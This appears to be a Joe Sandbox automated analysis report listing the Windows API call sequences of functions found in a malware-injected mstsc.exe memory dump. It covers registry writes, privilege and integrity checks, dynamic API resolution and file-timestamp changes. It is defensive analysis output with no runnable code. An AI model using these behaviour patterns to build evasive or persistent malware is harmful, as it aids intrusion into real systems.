    • GetProcessHeap.KERNEL32(00000008,00000069), ref: 0006DC31
    • HeapAlloc.KERNEL32(00000000), ref: 0006DC38
    • ReleaseCapture.USER32 ref: 0006DC47
      • Part of subcall function 0006D97F: ExpandEnvironmentStringsW.KERNEL32(00106D80,00000000,00000000,00106D80,00106D80,00106D80,00106D80,?,0006DA06,00072000,7142434B,00106D80,?,00061ADF,?), ref: 0006D991
      • Part of subcall function 0006D97F: GetProcessHeap.KERNEL32(00000008,00000000,?,0006DA06,00072000,7142434B,00106D80,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x), ref: 0006D9AB
      • Part of subcall function 0006D97F: HeapAlloc.KERNEL32(00000000,?,0006DA06,00072000,7142434B,00106D80,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006D9B2
      • Part of subcall function 0006D97F: ExpandEnvironmentStringsW.KERNEL32(00106D80,00000000,7142434B,00000000,?,0006DA06,00072000,7142434B,00106D80,?,00061ADF,?), ref: 0006D9CD
      • Part of subcall function 0006D97F: GetProcessHeap.KERNEL32(00000000,00000000,0006DA06,00072000,7142434B,00106D80,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006D9DA
      • Part of subcall function 0006D97F: HeapFree.KERNEL32(00000000,?,00061ADF), ref: 0006D9E1
    • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0006DC8F
    • GetFileTime.KERNEL32(00000000,?,?,00000016), ref: 0006DCAA
    • SystemTimeToFileTime.KERNEL32(?,?), ref: 0006DCBB
    • SystemTimeToFileTime.KERNEL32(?,?), ref: 0006DCC8
    • SystemTimeToFileTime.KERNEL32(?,00000016), ref: 0006DCD5
    • CloseHandle.KERNEL32(00000000), ref: 0006DCDC
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006DCE5
    • HeapFree.KERNEL32(00000000), ref: 0006DCEC
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006DCF5
    • HeapFree.KERNEL32(00000000), ref: 0006DCFC
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • GetCurrentProcessId.KERNEL32(00000000,?,00000000), ref: 00067A81
    • GetProcessHeap.KERNEL32(00000008,0000000B,00000000,?,00000000), ref: 00067AC1
    • HeapAlloc.KERNEL32(00000000), ref: 00067AC8
    • GetShellWindow.USER32 ref: 00067ADF
    • GetProcessHeap.KERNEL32(00000008,0000001C), ref: 00067B50
    • HeapAlloc.KERNEL32(00000000), ref: 00067B57
    • DestroyCaret.USER32 ref: 00067B6D
    • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00067B9E
    • GetProcAddress.KERNEL32(00000000), ref: 00067BA5
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00067BB4
    • HeapFree.KERNEL32(00000000), ref: 00067BC1
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00067BC5
    • HeapFree.KERNEL32(00000000), ref: 00067BCC
    • CloseHandle.KERNEL32(00000002), ref: 00067C02
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,00000015,00000000,?,?), ref: 00068799
    • HeapAlloc.KERNEL32(00000000), ref: 0006879C
    • GetTickCount.KERNEL32 ref: 000687B8
    • GetProcessHeap.KERNEL32(00000008,0000000D), ref: 00068804
    • HeapAlloc.KERNEL32(00000000), ref: 00068807
    • GetCapture.USER32 ref: 00068819
    • GetProcessHeap.KERNEL32(00000008,0000000F), ref: 0006886A
    • HeapAlloc.KERNEL32(00000000), ref: 00068871
    • GetCursor.USER32 ref: 00068885
    • LoadLibraryA.KERNEL32(66713859), ref: 000688B6
    • GetProcAddress.KERNEL32(00000000), ref: 000688BD
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000688DF
    • HeapFree.KERNEL32(00000000), ref: 000688EC
    • GetProcessHeap.KERNEL32(00000000,66713859), ref: 000688F7
    • HeapFree.KERNEL32(00000000), ref: 000688FA
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00068901
    • HeapFree.KERNEL32(00000000), ref: 00068904
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,0000004D,00072000,7142434B,00106D80), ref: 0006FD46
    • HeapAlloc.KERNEL32(00000000), ref: 0006FD49
    • GetDialogBaseUnits.USER32 ref: 0006FD64
    • RegOpenKeyExW.ADVAPI32(?,00000000,00000000,000F003F,00000000), ref: 0006FD98
    • GetProcessHeap.KERNEL32(00000008,0000003D), ref: 0006FDFD
    • HeapAlloc.KERNEL32(00000000), ref: 0006FE00
    • CloseClipboard.USER32 ref: 0006FE14
    • RegSetValueExW.ADVAPI32(00000000,00000000,00000000,00000004,?,00000004), ref: 0006FE47
    • RegCloseKey.ADVAPI32(00000000), ref: 0006FE50
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006FE5F
    • HeapFree.KERNEL32(00000000), ref: 0006FE62
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006FE6E
    • HeapFree.KERNEL32(00000000), ref: 0006FE71
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,00000019), ref: 0006D50E
    • HeapAlloc.KERNEL32(00000000), ref: 0006D515
    • GetDesktopWindow.USER32 ref: 0006D524
    • CoInitialize.OLE32(00000000), ref: 0006D553
    • CoCreateInstance.OLE32(00070380,00000000,00000001,00070370,?), ref: 0006D572
    • StrStrIW.SHLWAPI(00000000), ref: 0006D634
    • StrStrIW.SHLWAPI(00000000,00000000), ref: 0006D668
    • StrStrIW.SHLWAPI(00000000,00000000), ref: 0006D6B3
    • StrCpyNW.SHLWAPI(?,00000002,-000000FE), ref: 0006D6D1
    • GetFileAttributesW.KERNEL32(?), ref: 0006D6DE
    • CoTaskMemFree.OLE32(00000000), ref: 0006D6FA
    • CoTaskMemFree.OLE32(00000000), ref: 0006D6FF
    • CoTaskMemFree.OLE32(00000001), ref: 0006D70B
    • CoTaskMemFree.OLE32(?), ref: 0006D71B
    • CoUninitialize.OLE32 ref: 0006D74C
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006D754
    • HeapFree.KERNEL32(00000000), ref: 0006D75B
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,00000015,?,?,00000000), ref: 0006EB13
    • HeapAlloc.KERNEL32(00000000,?,00000000), ref: 0006EB16
    • GetTickCount.KERNEL32(?,00000000), ref: 0006EB2B
    • GetProcessHeap.KERNEL32(00000008,0000000B,?,00000000), ref: 0006EB76
    • HeapAlloc.KERNEL32(00000000,?,00000000), ref: 0006EB79
    • GetShellWindow.USER32 ref: 0006EB8D
    • LoadLibraryA.KERNEL32(00000000), ref: 0006EBBE
    • GetProcAddress.KERNEL32(00000000,?,00000000), ref: 0006EBC5
    • GetProcessHeap.KERNEL32(00000008,?,?,00000000), ref: 0006EBD6
    • HeapAlloc.KERNEL32(00000000,?,00000000), ref: 0006EBDD
    • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 0006EC3C
    • HeapFree.KERNEL32(00000000,?,00000000), ref: 0006EC3F
    • GetProcessHeap.KERNEL32(00000000,?,?,00000000), ref: 0006EC48
    • HeapFree.KERNEL32(00000000,?,00000000), ref: 0006EC4B
    • GetProcessHeap.KERNEL32(00000000,?,?,00000000), ref: 0006EC5F
    • HeapFree.KERNEL32(00000000,?,00000000), ref: 0006EC66
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • GetModuleHandleW.KERNEL32(00000000,7142434B,00106D80,?,?,?,?,?,?,?,?,00061A31), ref: 0006E6FD
    • GetVersion.KERNEL32(?,?,?,?,?,?,?,?,00061A31,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006E703
    • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00061A31,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006E70E
      • Part of subcall function 000673B6: GetProcessHeap.KERNEL32(00000008,0000000E,?,7142434B,00106D80), ref: 000673EF
      • Part of subcall function 000673B6: HeapAlloc.KERNEL32(00000000), ref: 000673F2
      • Part of subcall function 000673B6: GetLogicalDrives.KERNEL32 ref: 00067406
      • Part of subcall function 000673B6: GetProcessHeap.KERNEL32(00000008,0000000E), ref: 00067460
      • Part of subcall function 000673B6: HeapAlloc.KERNEL32(00000000), ref: 00067463
      • Part of subcall function 000673B6: IsSystemResumeAutomatic.KERNEL32 ref: 00067477
      • Part of subcall function 000673B6: GetModuleHandleA.KERNEL32(00000000,?), ref: 000674A8
      • Part of subcall function 000673B6: GetProcAddress.KERNEL32(00000000), ref: 000674AF
      • Part of subcall function 000673B6: GetProcessHeap.KERNEL32(00000000,00000000), ref: 000674BE
      • Part of subcall function 000673B6: HeapFree.KERNEL32(00000000), ref: 000674C7
      • Part of subcall function 000673B6: GetProcessHeap.KERNEL32(00000000,?), ref: 000674CC
      • Part of subcall function 000673B6: HeapFree.KERNEL32(00000000), ref: 000674CF
      • Part of subcall function 0006E684: GetModuleHandleA.KERNEL32(?,?), ref: 0006E6BD
      • Part of subcall function 0006E684: GetProcAddress.KERNEL32(00000000), ref: 0006E6C4
    • GetProcessHeap.KERNEL32(00000008,00000020,?,?,?,?,?,?,?,?,00061A31), ref: 0006E72D
    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,00061A31,?,?,?,?,?,KCBqiNhR7x), ref: 0006E736
    • GetComputerNameW.KERNEL32(00000000,?), ref: 0006E751
    • GetProcessHeap.KERNEL32(00000008,0000001D,?), ref: 0006E78C
    • HeapAlloc.KERNEL32(00000000), ref: 0006E78F
    • GetClipboardOwner.USER32 ref: 0006E79C
    • lstrcpyW.KERNEL32(00000000), ref: 0006E7CF
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006E7DE
    • HeapFree.KERNEL32(00000000), ref: 0006E7E1
      • Part of subcall function 0006E310: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020119,0006E7ED,?), ref: 0006E39F
      • Part of subcall function 0006E310: GetProcessHeap.KERNEL32(00000008,000000C8,774229EE,76E6FE8D), ref: 0006E3B7
      • Part of subcall function 0006E310: HeapAlloc.KERNEL32(00000000), ref: 0006E3BE
      • Part of subcall function 0006E310: RegQueryValueExA.ADVAPI32(0006E7ED,?,00000000,00000000,00000000,?), ref: 0006E3EB
      • Part of subcall function 0006E310: RegQueryValueExA.ADVAPI32(0006E7ED,74736E49,00000000,00000000,?,00000004), ref: 0006E411
      • Part of subcall function 0006E310: RegQueryValueExA.ADVAPI32(0006E7ED,49676552,00000000,00000000,?,00000004), ref: 0006E43F
      • Part of subcall function 0006E310: GetTickCount.KERNEL32 ref: 0006E445
      • Part of subcall function 0006E310: RegCloseKey.ADVAPI32(0006E7ED), ref: 0006E451
      • Part of subcall function 0006E310: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,0004001F,0006E7ED), ref: 0006E467
      • Part of subcall function 0006E310: RegSetValueExA.ADVAPI32(0006E7ED,49676552,00000000,00000004,?,00000004), ref: 0006E482
      • Part of subcall function 0006E310: RegCloseKey.ADVAPI32(0006E7ED), ref: 0006E499
      • Part of subcall function 0006E310: lstrlenA.KERNEL32(00000008), ref: 0006E4A5
      • Part of subcall function 0006E310: GetProcessHeap.KERNEL32(00000008,00000010), ref: 0006E4CB
      • Part of subcall function 0006E310: HeapAlloc.KERNEL32(00000000), ref: 0006E4D2
      • Part of subcall function 0006E310: GetComputerNameA.KERNEL32(00000000,00000004), ref: 0006E4DF
      • Part of subcall function 0006E310: lstrlenA.KERNEL32(00000000), ref: 0006E4E6
      • Part of subcall function 0006E310: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006E503
      • Part of subcall function 0006E310: HeapFree.KERNEL32(00000000), ref: 0006E510
      • Part of subcall function 0006E310: GetProcessHeap.KERNEL32(00000000,?), ref: 0006E517
      • Part of subcall function 0006E310: HeapFree.KERNEL32(00000000), ref: 0006E51E
    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0006E80F
    • CheckTokenMembership.ADVAPI32(00000000,?,00061A31), ref: 0006E82A
    • FreeSid.ADVAPI32(?), ref: 0006E836
      • Part of subcall function 0006E967: GetCurrentProcess.KERNEL32(00020008,0006E84F), ref: 0006E984
      • Part of subcall function 0006E967: OpenProcessToken.ADVAPI32(00000000), ref: 0006E98B
      • Part of subcall function 0006E967: GetTokenInformation.ADVAPI32(0006E84F,00000014,00000000,00000004,?), ref: 0006E9A4
      • Part of subcall function 0006E967: CloseHandle.KERNEL32(0006E84F), ref: 0006E9AD
    • CreateWellKnownSid.ADVAPI32(00000027,00000000,?,00061A31), ref: 0006E866
    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0006E87C
      • Part of subcall function 0006E897: OpenProcessToken.ADVAPI32(00000000,00000008,?,00000000,00000000,00000000,?,0006F1FF), ref: 0006E8A6
      • Part of subcall function 0006E897: GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,?,?,?,0006F1FF), ref: 0006E8C2
      • Part of subcall function 0006E897: GetLastError.KERNEL32(?,0006F1FF), ref: 0006E8D0
      • Part of subcall function 0006E897: GetProcessHeap.KERNEL32(00000008,?,76E6FE8D,?,0006F1FF), ref: 0006E8E1
      • Part of subcall function 0006E897: HeapAlloc.KERNEL32(00000000,?,0006F1FF), ref: 0006E8E8
      • Part of subcall function 0006E897: GetTokenInformation.KERNELBASE(?,00000019,00000000,?,?,?,0006F1FF), ref: 0006E901
      • Part of subcall function 0006E897: GetSidSubAuthorityCount.ADVAPI32(00000000,?,0006F1FF), ref: 0006E90D
      • Part of subcall function 0006E897: GetSidSubAuthority.ADVAPI32(00000000,?,?,0006F1FF), ref: 0006E924
      • Part of subcall function 0006E897: GetProcessHeap.KERNEL32(00000000,00000000,?,0006F1FF), ref: 0006E946
      • Part of subcall function 0006E897: HeapFree.KERNEL32(00000000,?,0006F1FF), ref: 0006E94D
      • Part of subcall function 0006E897: CloseHandle.KERNEL32(?), ref: 0006E957
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,00000014,?,00000000,00000000), ref: 0006F74E
    • HeapAlloc.KERNEL32(00000000), ref: 0006F751
    • GetClipboardSequenceNumber.USER32 ref: 0006F766
    • GetProcessHeap.KERNEL32(00000008,0000000B), ref: 0006F7B8
    • HeapAlloc.KERNEL32(00000000), ref: 0006F7BB
    • GetShellWindow.USER32 ref: 0006F7CF
    • GetModuleHandleA.KERNEL32(00000000,?), ref: 0006F800
    • GetProcAddress.KERNEL32(00000000), ref: 0006F807
      • Part of subcall function 0006F4A9: GetProcessHeap.KERNEL32(00000008,0000000B,?,00000000,00000000), ref: 0006F4DE
      • Part of subcall function 0006F4A9: HeapAlloc.KERNEL32(00000000), ref: 0006F4E1
      • Part of subcall function 0006F4A9: GetShellWindow.USER32 ref: 0006F4FD
      • Part of subcall function 0006F4A9: GetProcessHeap.KERNEL32(00000008,00000017), ref: 0006F55D
      • Part of subcall function 0006F4A9: HeapAlloc.KERNEL32(00000000), ref: 0006F560
      • Part of subcall function 0006F4A9: GetInputState.USER32 ref: 0006F574
      • Part of subcall function 0006F4A9: GetModuleHandleA.KERNEL32(?,00000000), ref: 0006F59E
      • Part of subcall function 0006F4A9: GetProcAddress.KERNEL32(00000000), ref: 0006F5A5
      • Part of subcall function 0006F4A9: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006F5B5
      • Part of subcall function 0006F4A9: HeapFree.KERNEL32(00000000), ref: 0006F5C2
      • Part of subcall function 0006F4A9: GetProcessHeap.KERNEL32(00000000,?), ref: 0006F5C7
      • Part of subcall function 0006F4A9: HeapFree.KERNEL32(00000000), ref: 0006F5CE
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006F835
    • HeapFree.KERNEL32(00000000), ref: 0006F842
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0006F847
    • HeapFree.KERNEL32(00000000), ref: 0006F84E
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • GetVersion.KERNEL32(76E6FE8D,00000000,?), ref: 00063971
    • GetProcessHeap.KERNEL32(00000008,00000025), ref: 000639B0
    • HeapAlloc.KERNEL32(00000000), ref: 000639B7
    • GetCurrentProcessId.KERNEL32 ref: 000639C8
    • GetProcessHeap.KERNEL32(00000008,00000051), ref: 00063A72
    • HeapAlloc.KERNEL32(00000000), ref: 00063A79
    • GetForegroundWindow.USER32 ref: 00063A8A
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00063AC8
    • HeapFree.KERNEL32(00000000), ref: 00063ACF
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,0000000B,76E2204D,00000000,?), ref: 0006F9F1
    • HeapAlloc.KERNEL32(00000000), ref: 0006F9F4
    • GetShellWindow.USER32 ref: 0006FA08
    • GetProcessHeap.KERNEL32(00000008,00000011), ref: 0006FA67
    • HeapAlloc.KERNEL32(00000000), ref: 0006FA6A
    • GetCapture.USER32 ref: 0006FA7E
    • GetModuleHandleA.KERNEL32(?,00000000), ref: 0006FAAF
    • GetProcAddress.KERNEL32(00000000), ref: 0006FAB6
    • HeapFree.KERNEL32(00000000), ref: 0006FB6C
      • Part of subcall function 0006F6F4: GetProcessHeap.KERNEL32(00000008,00000014,?,00000000,00000000), ref: 0006F74E
      • Part of subcall function 0006F6F4: HeapAlloc.KERNEL32(00000000), ref: 0006F751
      • Part of subcall function 0006F6F4: GetClipboardSequenceNumber.USER32 ref: 0006F766
      • Part of subcall function 0006F6F4: GetProcessHeap.KERNEL32(00000008,0000000B), ref: 0006F7B8
      • Part of subcall function 0006F6F4: HeapAlloc.KERNEL32(00000000), ref: 0006F7BB
      • Part of subcall function 0006F6F4: GetShellWindow.USER32 ref: 0006F7CF
      • Part of subcall function 0006F6F4: GetModuleHandleA.KERNEL32(00000000,?), ref: 0006F800
      • Part of subcall function 0006F6F4: GetProcAddress.KERNEL32(00000000), ref: 0006F807
      • Part of subcall function 0006F6F4: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006F835
      • Part of subcall function 0006F6F4: HeapFree.KERNEL32(00000000), ref: 0006F842
      • Part of subcall function 0006F6F4: GetProcessHeap.KERNEL32(00000000,?), ref: 0006F847
      • Part of subcall function 0006F6F4: HeapFree.KERNEL32(00000000), ref: 0006F84E
      • Part of subcall function 0006F4A9: GetProcessHeap.KERNEL32(00000008,0000000B,?,00000000,00000000), ref: 0006F4DE
      • Part of subcall function 0006F4A9: HeapAlloc.KERNEL32(00000000), ref: 0006F4E1
      • Part of subcall function 0006F4A9: GetShellWindow.USER32 ref: 0006F4FD
      • Part of subcall function 0006F4A9: GetProcessHeap.KERNEL32(00000008,00000017), ref: 0006F55D
      • Part of subcall function 0006F4A9: HeapAlloc.KERNEL32(00000000), ref: 0006F560
      • Part of subcall function 0006F4A9: GetInputState.USER32 ref: 0006F574
      • Part of subcall function 0006F4A9: GetModuleHandleA.KERNEL32(?,00000000), ref: 0006F59E
      • Part of subcall function 0006F4A9: GetProcAddress.KERNEL32(00000000), ref: 0006F5A5
      • Part of subcall function 0006F4A9: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006F5B5
      • Part of subcall function 0006F4A9: HeapFree.KERNEL32(00000000), ref: 0006F5C2
      • Part of subcall function 0006F4A9: GetProcessHeap.KERNEL32(00000000,?), ref: 0006F5C7
      • Part of subcall function 0006F4A9: HeapFree.KERNEL32(00000000), ref: 0006F5CE
    • CloseHandle.KERNEL32(00000000), ref: 0006FB4A
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006FB59
    • HeapFree.KERNEL32(00000000), ref: 0006FB62
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0006FB69
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • OpenProcess.KERNEL32(00000400,00000000), ref: 00064AFF
    • GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 00064B21
    • GetProcessHeap.KERNEL32(00000008,0000000E), ref: 00064B58
    • HeapAlloc.KERNEL32(00000000), ref: 00064B5F
    • GetForegroundWindow.USER32 ref: 00064B70
    • wsprintfA.USER32 ref: 00064BAD
    • FindAtomA.KERNEL32(?), ref: 00064BBD
    • GlobalFindAtomA.KERNEL32(?), ref: 00064BD2
    • GlobalAddAtomA.KERNEL32(?), ref: 00064BE4
    • AddAtomA.KERNEL32(?), ref: 00064BF1
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00064BFD
    • HeapFree.KERNEL32(00000000), ref: 00064C04
    • CloseHandle.KERNEL32(?), ref: 00064C0D
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,0000000B,00000000), ref: 0006BA29
    • HeapAlloc.KERNEL32(00000000), ref: 0006BA2C
    • GetShellWindow.USER32 ref: 0006BA40
    • GetProcessHeap.KERNEL32(00000008,00000011), ref: 0006BA9F
    • HeapAlloc.KERNEL32(00000000), ref: 0006BAA2
    • GetMessageTime.USER32 ref: 0006BAB6
    • GetModuleHandleA.KERNEL32(?,00000000), ref: 0006BAE7
    • GetProcAddress.KERNEL32(00000000), ref: 0006BAEE
      • Part of subcall function 00063E17: GetProcessHeap.KERNEL32(00000008,00000208,0007CAA8), ref: 00063E3F
      • Part of subcall function 00063E17: HeapAlloc.KERNEL32(00000000), ref: 00063E42
      • Part of subcall function 00063E17: GetProcessHeap.KERNEL32(00000008,00000039,00020019), ref: 00063ED2
      • Part of subcall function 00063E17: HeapAlloc.KERNEL32(00000000), ref: 00063ED9
      • Part of subcall function 00063E17: GetTickCount.KERNEL32 ref: 00063EED
      • Part of subcall function 00063E17: wsprintfW.USER32 ref: 00063F24
      • Part of subcall function 00063E17: GetProcessHeap.KERNEL32(00000008,00000019), ref: 00063F6E
      • Part of subcall function 00063E17: HeapAlloc.KERNEL32(00000000), ref: 00063F71
      • Part of subcall function 00063E17: GetCaretBlinkTime.USER32 ref: 00063F86
      • Part of subcall function 00063E17: wsprintfW.USER32 ref: 00063FC8
      • Part of subcall function 00063E17: RegQueryValueExW.ADVAPI32(00000000,?,00000000,00000003,00000000,?,00020019), ref: 0006401D
      • Part of subcall function 00063E17: GetProcessHeap.KERNEL32(00000008,?), ref: 0006402C
      • Part of subcall function 00063E17: HeapAlloc.KERNEL32(00000000), ref: 0006402F
      • Part of subcall function 00063E17: RegQueryValueExW.ADVAPI32(?,?,00000000,00000003,00000000,?), ref: 00064051
      • Part of subcall function 00063E17: RegCloseKey.ADVAPI32(?), ref: 00064077
      • Part of subcall function 00063E17: GetProcessHeap.KERNEL32(00000008,?), ref: 00064099
      • Part of subcall function 00063E17: HeapAlloc.KERNEL32(00000000), ref: 0006409C
      • Part of subcall function 00063E17: GetProcessHeap.KERNEL32(00000000,00000000,00000000), ref: 000640AE
      • Part of subcall function 00063E17: HeapReAlloc.KERNEL32(00000000), ref: 000640B1
      • Part of subcall function 00063E17: GetProcessHeap.KERNEL32(00000000,00000000), ref: 000640D5
      • Part of subcall function 00063E17: HeapFree.KERNEL32(00000000), ref: 000640D8
      • Part of subcall function 00063E17: GetProcessHeap.KERNEL32(00000000,00000000,00020019), ref: 000640E4
      • Part of subcall function 00063E17: HeapFree.KERNEL32(00000000), ref: 000640ED
      • Part of subcall function 00063E17: RegCloseKey.ADVAPI32(?), ref: 000640FC
      • Part of subcall function 00063E17: GetProcessHeap.KERNEL32(00000000,?), ref: 00064107
      • Part of subcall function 00063E17: HeapFree.KERNEL32(00000000), ref: 0006410A
      • Part of subcall function 00063E17: GetProcessHeap.KERNEL32(00000000,00000000,00020019), ref: 00064112
      • Part of subcall function 00063E17: HeapFree.KERNEL32(00000000), ref: 00064115
      • Part of subcall function 0006482B: GetProcessHeap.KERNEL32(00000000,?,?,00000000,0006318E,?,?,?,?,?,?,?,?,?,?,00062973), ref: 00064845
      • Part of subcall function 0006482B: HeapFree.KERNEL32(00000000,?,?), ref: 0006484C
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006BB23
    • HeapFree.KERNEL32(00000000), ref: 0006BB2C
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0006BB31
    • HeapFree.KERNEL32(00000000), ref: 0006BB34
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,00000010), ref: 00064C65
    • HeapAlloc.KERNEL32(00000000), ref: 00064C68
    • GetMessageTime.USER32 ref: 00064C7D
    • GetProcessHeap.KERNEL32(00000008,0000000E), ref: 00064CD4
    • HeapAlloc.KERNEL32(00000000), ref: 00064CD7
    • IsSystemResumeAutomatic.KERNEL32 ref: 00064CEB
    • GetModuleHandleA.KERNEL32(00000000,?), ref: 00064D1C
    • GetProcAddress.KERNEL32(00000000), ref: 00064D23
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00064D4F
    • HeapFree.KERNEL32(00000000), ref: 00064D5C
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00064D61
    • HeapFree.KERNEL32(00000000), ref: 00064D68
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,00000061,?,00000000,00000000), ref: 0006D7EF
    • HeapAlloc.KERNEL32(00000000,?,00000000,00000000), ref: 0006D7F2
    • GetShellWindow.USER32 ref: 0006D803
    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000004,00000000,00000208,00000000,?,00000000,00000000), ref: 0006D83D
    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000208,?,00000000,00000000), ref: 0006D86B
    • CloseHandle.KERNEL32 ref: 0006D880
    • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0006D88E
    • HeapFree.KERNEL32(00000000,?,00000000), ref: 0006D891
    • StrCpyW.SHLWAPI(00000000,?,?,00000000,00000000), ref: 0006D89F
    • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0006D8A7
    • HeapFree.KERNEL32(00000000,?,00000000), ref: 0006D8AA
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,0000000B,76E2204D,00000000,?), ref: 0006F888
    • HeapAlloc.KERNEL32(00000000), ref: 0006F88F
    • GetShellWindow.USER32 ref: 0006F8A1
    • GetProcessHeap.KERNEL32(00000008,00000016), ref: 0006F905
    • HeapAlloc.KERNEL32(00000000), ref: 0006F90C
    • CloseClipboard.USER32 ref: 0006F920
    • LoadLibraryA.KERNEL32(?), ref: 0006F951
    • GetProcAddress.KERNEL32(00000000), ref: 0006F958
      • Part of subcall function 0006F4A9: GetProcessHeap.KERNEL32(00000008,0000000B,?,00000000,00000000), ref: 0006F4DE
      • Part of subcall function 0006F4A9: HeapAlloc.KERNEL32(00000000), ref: 0006F4E1
      • Part of subcall function 0006F4A9: GetShellWindow.USER32 ref: 0006F4FD
      • Part of subcall function 0006F4A9: GetProcessHeap.KERNEL32(00000008,00000017), ref: 0006F55D
      • Part of subcall function 0006F4A9: HeapAlloc.KERNEL32(00000000), ref: 0006F560
